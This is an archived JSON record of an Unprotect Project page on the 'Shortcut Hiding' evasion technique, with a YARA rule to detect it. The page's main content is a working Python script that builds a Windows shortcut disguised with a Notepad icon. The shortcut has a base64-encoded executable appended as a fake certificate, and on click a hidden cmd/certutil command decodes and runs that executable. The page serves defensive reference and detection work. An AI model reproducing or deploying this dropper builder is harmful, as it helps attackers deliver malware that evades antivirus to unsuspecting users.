{
	"id": "eab6f52a-bc4f-40b8-ac83-54ff0a7d3d3f",
	"created_at": "2026-04-06T00:14:25.724244Z",
	"updated_at": "2026-04-10T03:21:16.646671Z",
	"deleted_at": null,
	"sha1_hash": "b77ee78abce94b30fdb0763f59c4e65025a08473",
	"title": "Shortcut Hiding - Unprotect Project",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 47382,
	"plain_text": "Shortcut Hiding - Unprotect Project\r\nArchived: 2026-04-05 15:38:50 UTC\r\nWindows shortcut can be used to store code that downloads a malicious file from the internet, or that stores the\r\nmalicious file directly within the shortcut itself. This can make it difficult for antivirus software to detect the\r\nmalicious application, as the file is not stored in a typical location on the computer. Additionally, the use of a\r\nshortcut can make it easier for the attacker to hide the malicious code and evade detection.\r\nTechnique Identifier\r\nU0505\r\nEvasion Categories\r\nCode Snippets\r\nDescription\r\nThis Python script can be used to create a Windows shortcut with an embedded file. The script takes two\r\narguments: the file to embed and the name of the generated shortcut. The script first creates a Windows shortcut\r\nusing the winshell module. The shortcut is configured to run a command that will decode the embedded file and\r\nthen execute it. The script then encodes the file to be embedded using the base64 module and appends the encoded\r\ndata to the shortcut file in the form of a certificate. Finally, the script prints the name of the generated shortcut to\r\nthe screen. When the shortcut is clicked, the embedded file will be extracted and executed, allowing the malware\r\nto run on the system.\r\n#!/usr/bin/env python3\r\n# Requirements:\r\n# -\u003e pip install pypiwin32\r\n# -\u003e pip install winshell\r\nimport argparse\r\nimport base64\r\nimport os\r\nimport pathlib\r\nimport random\r\nimport string\r\nimport winshell\r\nhttps://unprotect.it/technique/shortcut-hiding/\r\nPage 1 of 3\n\ndef build_shortcut(file_to_embed, shortcut_name):\r\n output_shortcut = \"{}{}.lnk\".format(\r\n os.path.join(pathlib.Path(__file__).parent.resolve(), ''),\r\n shortcut_name,\r\n )\r\n with winshell.shortcut(output_shortcut) as shortcut:\r\n # @echo off \u0026 (for %i in (.lnk) do certutil -decode %i [filename]) \u0026 start [filename].exe\r\n payload = \"@echo off\u0026(for %i in (*.lnk) do certutil -decode %i {0}.exe)\u0026start {0}.exe\".format(\r\n \"\".join(random.choice(string.ascii_letters) for i in range(8))\r\n )\r\n shortcut.description = \"\"\r\n shortcut.show_cmd = \"min\"\r\n shortcut.working_directory = \"\"\r\n shortcut.path = \"%COMSPEC%\"\r\n shortcut.arguments = \"/c \\\"{}\".format(\r\n payload,\r\n )\r\n shortcut.icon_location = (\"%windir%\\\\notepad.exe\", 0)\r\n with open(file_to_embed, \"rb\") as file:\r\n encoded_content = base64.b64encode(file.read())\r\n with open(output_shortcut, \"ab\") as file:\r\n file.write(b\"-----BEGIN CERTIFICATE-----\")\r\n file.write(encoded_content)\r\n file.write(b\"-----END CERTIFICATE-----\")\r\n print(\"[+] Shortcut generated: \\\"{}\\\"\".format(output_shortcut))\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(description=f\"Create Windows Shortcut with Self-Extracting Embedded File.\")\r\n parser.add_argument('-f', '--embed-file', type=str, dest=\"embed_file\", required=True, help=\"File to inject i\r\n parser.add_argument('-n', '--shorcut-name', type=str, dest=\"shortcut_name\", required=True, help=\"Generated s\r\n try:\r\n argv = parser.parse_args()\r\n except IOError as e:\r\n parser.error()\r\nhttps://unprotect.it/technique/shortcut-hiding/\r\nPage 2 of 3\n\nbuild_shortcut(argv.embed_file, argv.shortcut_name)\r\n print(\"[+] Done.\")\r\nAuthor: Jean-Pierre LESUEUR (DarkCoderSc) / Target Platform: Windows\r\nDetection Rules\r\nrule YARA_Detect_ShortcutHiding\r\n{\r\n meta:\r\n author = \"Unprotect\"\r\n status = \"Experimental\"\r\n description = \"YARA rule for detecting Windows shortcuts with embedded malicious code\"\r\n strings:\r\n $payload_start = \"\u0026(for %i in (*.lnk) do certutil -decode %i\"\r\n $payload_end = \"\u0026start\"\r\n $encoded_content = \"BEGIN CERTIFICATE\"\r\n condition:\r\n all of them\r\n}\r\nLast Revised\r\nMarch 24, 2026\r\nSource: https://unprotect.it/technique/shortcut-hiding/\r\nhttps://unprotect.it/technique/shortcut-hiding/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://unprotect.it/technique/shortcut-hiding/"
	],
	"report_names": [
		"shortcut-hiding"
	],
	"threat_actors": [],
	"ts_created_at": 1775434465,
	"ts_updated_at": 1775791276,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b77ee78abce94b30fdb0763f59c4e65025a08473.pdf",
		"text": "https://archive.orkl.eu/b77ee78abce94b30fdb0763f59c4e65025a08473.txt",
		"img": "https://archive.orkl.eu/b77ee78abce94b30fdb0763f59c4e65025a08473.jpg"
	}
}